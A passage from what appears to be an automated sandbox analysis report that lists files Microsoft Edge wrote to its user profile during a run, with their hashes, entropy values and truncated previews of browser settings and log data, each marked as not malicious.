h":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\cf2ffe9a-fcdc-4219-b646-417d01aa95f4.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (17205), with no line terminators
Category:	dropped
Size (bytes):	17207
Entropy (8bit):	5.4891562385975705
Encrypted:	false
SSDEEP:	384:st1PGQSu4+scKCDvCfiKq70bSzw+bGJQwkg:sjOXutKC+6bGaBg
MD5:	2FD719EA24436F7CB05ACC2DA5BF372A
SHA1:	E51C9FC00500DF3B43EC5BF8579EA3AB59DB0C90
SHA-256:	B640BB76B19C977EDE3F55549A71CD0F68F67C8C7A48E3760E2C8D86DBC1EFC7
SHA-512:	F5409ACA98F1F2802FE8AA2F5F0137AA5CA7E22470FEA2561D939DF996DFA232F93DD9DF683FD377A2ECE3E53BD8899F6D8D860AAB321B08B0A04DBD32D3B8B5
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377050730666443","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\d1ebebfd-eb25-4fae-8c4a-fbd7bebc32c7.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9861
Entropy (8bit):	5.1070370750413225
Encrypted:	false
SSDEEP:	192:st1kdp+swzKaFvrE9kDvTe8EbV+FGMQAwUNPxYJ:st1Q+scKCDpIbGJQOg
MD5:	B416A14104F920D8D3BC7C4098BD42F1
SHA1:	A3F7EB93714F0DBAD9EB8BEF63A64904F2C16C54
SHA-256:	FED570847D240E3D6C49E7973403D61169779C08DF631829B50373D7EA00AC6E
SHA-512:	AD38C3570486DEE9BCB44D2AC08EB552799E29760AA19F3C53A204AC6F87E61C684718E70F180C34815C47108F392313DAF80B0EFB6F63E15CD4082E75FB7823
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377050730666443","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\d33ddba1-54d6-4367-921e-15c73757b583.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	25012
Entropy (8bit):	5.568391548041707
Encrypted:	false
SSDEEP:	768:LfMyIXWMgW5w55f4+18F1+UoAYDCx9Tuqh0VfUC9xbog/OVPplIJWHtrwXsrpTtR:LUjX9gWa55f71u1ja0qkW8ptR
MD5:	5C0A88FFBBB5C58DF7DF0EC66D470D60
SHA1:	9EF3C3F5F93B055E9637AC988ACE04CE9B392AEC
SHA-256:	0327CCC79A977AAEA6FF1AF837C68B4E6455298BEC950ECDDDD61BD9C4BCF1EE
SHA-512:	79301909E5C8F226A94A5DFDDCA3C6E0E19B97179A92649317D843317A11BA9B34521F6E47E77CE6EF3DB1819755DEBD5755E1A740BDC7BC3AA59D3C80AE36CB
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13377050729938671","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13377050729938671","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.3410017321959524
Encrypted:	false
SSDEEP:	12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
MD5:	98643AF1CA5C0FE03CE8C687189CE56B
SHA1:	ECADBA79A364D72354C658FD6EA3D5CF938F686B
SHA-256:	4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
SHA-512:	68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\de1d4f1b-45f0-4870-8e5a-bcb277aead6c.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (1597), with CRLF line terminators
Category:	dropped
Size (bytes):	115717
Entropy (8bit):	5.183660917461099
Encrypted:	false
SSDEEP:	1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
MD5:	3D8183370B5E2A9D11D43EBEF474B305
SHA1:	155AB0A46E019E834FA556F3D818399BFF02162B
SHA-256:	6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
SHA-512:	B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
Malicious:	false
Preview:	{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs\|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs\|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.10213303686726843
Encrypted:	false
SSDEEP:	12:+upwSupwR5spEjVl/PnnnnnnnnnnnvoQ/Eou:+upwSupwRaoPnnnnnnnnnnnv1j
MD5:	3D355CFFC14D4AB1B85744504593B25F
SHA1:	91EA45009963E87089215758D15FCF2C0FCD6F93
SHA-256:	AE2B885B41F04067B3736C7D1A06FC5BCE2E516D334C1011B8E65FD095BC6217
SHA-512:	FCF96F3C59D285163BAEEEB7F341EA393D20702ECA92D461645DAAFE7226973293BCC933D636ABAA342DB15DED28265C251D18C2C1F6E162128A24F4BF836AA1
Malicious:	false
Preview:	..-.............M.......#.....L.$J...V.....<..%6..-.............M.......#.....L.$J...V.....<..%6........I...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite Write-Ahead Log, version 3007000
Category:	dropped
Size (bytes):	317272
Entropy (8bit):	0.8882392722504423
Encrypted:	false
SSDEEP:	384:LEZKSuUN02CwvsP6ydWoIX7AI1YVv8OFyjcyNuyqyIZyrxyIO:Cz7W
MD5:	E96963100A016319D3E7697D44EAFA9B
SHA1:	136B50311FBD9DEB3C34070024D21C95027B000D
SHA-256:	72729740AB2F117A73C65C3253644AE56A828A27806D150ABE5FBC4A14844452
SHA-512:	E3DA17FD2CAA98A293E3596106B11A34DC784B513BBBDF27828C84DFA6C2A3E2CD38B5D6DF366A9C54B8BF1F9486A3BB8BF23E247EB64ECB869C5153F89D2EBD
Malicious:	false
Preview:	7....-..........$J...V....M7'.z.........$J...V..h.IR..4.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	694
Entropy (8bit):	3.5238391684365755
Encrypted:	false
SSDEEP:	12:p9lc8QyOuuuuuuuuuuuuuuuuuuuuuuK7lljQYhU8j:pHaybhljQYz
MD5:	8A20BCAD295FCC83C9B335DDF7B5E8ED
SHA1:	90F53E6BBA4DE4AB0CA53B1CCBE1EB93544301CF
SHA-256:	9DD24992383185B12D47D2CDC24F739BC09CE56B3483CD7AAD195E1D99D668A5
SHA-512:	BCBD30772408F573067766CE567200E7057DA46E880FF51185B5DD8C7E56BE2B1379AD1F50C7D3A054007416DD86051C5D3ED886C366B45ADE014DE742A8E60D
Malicious:	false
Preview:	A..r.................20_1_1...1.,U.................20_1_1...1..$.0................39_config..........6.....n ...1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............=...;...............#38_h.......6.Z..W.F.....U.r.....U.r.........V.e................2..X0................39_config..........6.....n ....1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.224322487190818
Encrypted:	false
SSDEEP:	6:HApuMq2PN723oH+TcwtfrK+IFUt8YApzFZZmw+YApzFzkwON723oH+TcwtfrUeLJ:g5vVaYeb23FUt87N/+7/5OaYeb3J
MD5:	0B20D92BA748A46B934B7829CEA14D08
SHA1:	794DD6746FE53062B304307DB476E2EC833D3AC9
SHA-256:	DBF78A73113E0C5A42A9182DB56FB20FFAC31C1002025366AD958806B186D5F4
SHA-512:	2FDC6C23C66F0ECC86FD27BAC64B23E55408D23DDB8B53990ACC579E341E3D01D44F8752F8BF477016323B6F09D6C8C752B5E1CD4DDDBC3E5441C1008B982B4E
Malicious:	false
Preview:	2024/11/25-18:25:30.685 1e44 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/25-18:25:30.686 1e44 Recovering log #3.2024/11/25-18:25:30.686 1e44 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.224322487190818
Encrypted:	false
SSDEEP:	6:HApuMq2PN723oH+TcwtfrK+IFUt8YApzFZZmw+YApzFzkwON723oH+TcwtfrUeLJ:g5vVaYeb23FUt87N/+7/5OaYeb3J
MD5:	0B20D92BA748A46B934B7829CEA14D08
SHA1:	794DD6746FE53062B304307DB476E2EC833D3AC9
SHA-256:	DBF78A73113E0C5A42A9182DB56FB20FFAC31C1002025366AD958806B186D5F4
SHA-512:	2FDC6C23C66F0ECC86FD27BAC64B23E55408D23DDB8B53990ACC579E341E3D01D44F8752F8BF477016323B6F09D6C8C752B5E1CD4DDDBC3E5441C1008B982B4E
Malicious:	false
Preview:	2024/11/25-18:25:30.685 1e44 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/25-18:25:30.686 1e44 Recovering log #3.2024/11/25-18:25:30.686 1e44 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	816
Entropy (8bit):	4.0647916882227655
Encrypted:	false
SSDEEP:	12:G0nYUtTNop//z32m5t/yVf9HqlIZfkBA//DtKhKg+rOyBrgxvB1ySxs:G0nYUtypD32m3yWlIZMBA5NgKIvB8Sxs
MD5:	3BE72D8D40752B3A97028FDB2931FABA
SHA1:	A27EA4726857A948F0A4B074062B674469A9A371
SHA-256:	3C18553C8C3F7E801855F3579AC57F3C156D783BBA27FB35C6D2FB6CB89BD902
SHA-512:	8EBD4D6980BB7796615217E72BC65953C920B68B9259341CD52858C1E889EC90339E2A304FE0C971D6C6EF9AFC4A00CFB3E5CC89C7B2DF8737A0C7EC241BDADC
Malicious:	false
Preview:	.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....X...................20_.....W.J+.................19_......qY.................18_.....'}2..................37_.......c..................38_......i...................39_.....Owa..................20_.....4.9..................20_.....B.I..................19_..........................18_.....2.1..................37_..........................38_......=.%.................39_.....p.j..................9_.....JJ...................9_.....\|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... ......................__global... .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	346
Entropy (8bit):	5.197001512816969
Encrypted:	false
SSDEEP:	6:HApZOq2PN723oH+TcwtfrzAdIFUt8YApiZmw+YApOkwON723oH+TcwtfrzILJ:g7OvVaYeb9FUt87w/+745OaYeb2J
MD5:	F55DC78CF93BDEEF4D690E0AA65006A7
SHA1:	995E7180BEE98783BCB1E1E2A6DB261DA4F2C424
SHA-256:	7679F85136F80ECC21E4D81BA3AEF0DC9FB1BB21433CA079219E56C3BF9EC9FC
SHA-512:	A3E5BFF82377A2EC811228B74FD74A28F0CFDB127B50CBA53B28A7ABEECBC5FA785E564642F9B7992CF2B1C00766D337CE9BBDD8109B9BFC8F0FE6DED2078500
Malicious:	false
Preview:	2024/11/25-18:25:30.680 1e44 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/25-18:25:30.681 1e44 Recovering log #3.2024/11/25-18:25:30.681 1e44 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	346
Entropy (8bit):	5.197001512816969
Encrypted:	false
SSDEEP:	6:HApZOq2PN723oH+TcwtfrzAdIFUt8YApiZmw+YApOkwON723oH+TcwtfrzILJ:g7OvVaYeb9FUt87w/+745OaYeb2J
MD5:	F55DC78CF93BDEEF4D690E0AA65006A7
SHA1:	995E7180BEE98783BCB1E1E2A6DB261DA4F2C424
SHA-256:	7679F85136F80ECC21E4D81BA3AEF0DC9FB1BB21433CA079219E56C3BF9EC9FC
SHA-512:	A3E5BFF82377A2EC811228B74FD74A28F0CFDB127B50CBA53B28A7ABEECBC5FA785E564642F9B7992CF2B1C00766D337CE9BBDD8109B9BFC8F0FE6DED2078500
Malicious:	false
Preview:	2024/11/25-18:25:30.680 1e44 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/25-18:25:30.681 1e44 Recovering log #3.2024/11/25-18:25:30.681 1e44 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	120
Entropy (8bit):	3.32524464792714
Encrypted:	false
SSDEEP:	3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
MD5:	A397E5983D4A1619E36143B4D804B870
SHA1:	AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
SHA-256:	9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
SHA-512:	4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
Malicious:	false
Preview:	C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.6612262562697895
Encrypted:	false
SSDEEP:	3:NYLFRQZ:ap2Z
MD5:	B64BD80D877645C2DD14265B1A856F8A
SHA1:	F7379E1A6F8CE062E891C56736C789C7EA77CD6A
SHA-256:	83476CEEEB7682F41030664B4E17305986878D14E82D0C277FB99EC546B44569
SHA-512:	734A7316A269C76DD052D980CC0D5209C0BFEDFFC55B11C58FA25C433CE8A42536827298C3E58CACD68CC01593C23D39350E956E8DE2268D8D29918E1F0667F2
Malicious:	false
Preview:	117.0.2045.55

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44455
Entropy (8bit):	6.089776935272958
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWqdi1zNtPMykzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn2NkzItSmd6qE7lFoC
MD5:	0E4A4F51C52FD539CB2206BBDA3778D8
SHA1:	2D136B3C2A9371B102D0EDE94B090276A1795593
SHA-256:	F8FE6F059DB72E1E39051B57E8891B96B5B7CF1F031F37F2005E6AB915192CB4
SHA-512:	533FCC2751EBB96A7D4D8892D5DFD46D5AD2E8C5F82DC90D20FC66FE0C322B38B8A6A697ECC978DC1D003D7512BBEF6E0BC8F25407739C15F97A6BA8E086A43B
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF39d3b.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44455
Entropy (8bit):	6.089776935272958
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWqdi1zNtPMykzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn2NkzItSmd6qE7lFoC
MD5:	0E4A4F51C52FD539CB2206BBDA3778D8
SHA1:	2D136B3C2A9371B102D0EDE94B090276A1795593
SHA-256:	F8FE6F059DB72E1E39051B57E8891B96B5B7CF1F031F37F2005E6AB915192CB4
SHA-512:	533FCC2751EBB96A7D4D8892D5DFD46D5AD2E8C5F82DC90D20FC66FE0C322B38B8A6A697ECC978DC1D003D7512BBEF6E0BC8F25407739C15F97A6BA8E086A43B
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF39d4b.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44455
Entropy (8bit):	6.089776935272958
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWqdi1zNtPMykzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn2NkzItSmd6qE7lFoC
MD5:	0E4A4F51C52FD539CB2206BBDA3778D8
SHA1:	2D136B3C2A9371B102D0EDE94B090276A1795593
SHA-256:	F8FE6F059DB72E1E39051B57E8891B96B5B7CF1F031F37F2005E6AB915192CB4
SHA-512:	533FCC2751EBB96A7D4D8892D5DFD46D5AD2E8C5F82DC90D20FC66FE0C322B38B8A6A697ECC978DC1D003D7512BBEF6E0BC8F25407739C15F97A6BA8E086A43B
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF39ef0.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44455
Entropy (8bit):	6.089776935272958
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWqdi1zNtPMykzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn2NkzItSmd6qE7lFoC
MD5:	0E4A4F51C52FD539CB2206BBDA3778D8
SHA1:	2D136B3C2A9371B102D0EDE94B090276A1795593
SHA-256:	F8FE6F059DB72E1E39051B57E8891B96B5B7CF1F031F37F2005E6AB915192CB4
SHA-512:	533FCC2751EBB96A7D4D8892D5DFD46D5AD2E8C5F82DC90D20FC66FE0C322B38B8A6A697ECC978DC1D003D7512BBEF6E0BC8F25407739C15F97A6BA8E086A43B
Malicious:	false
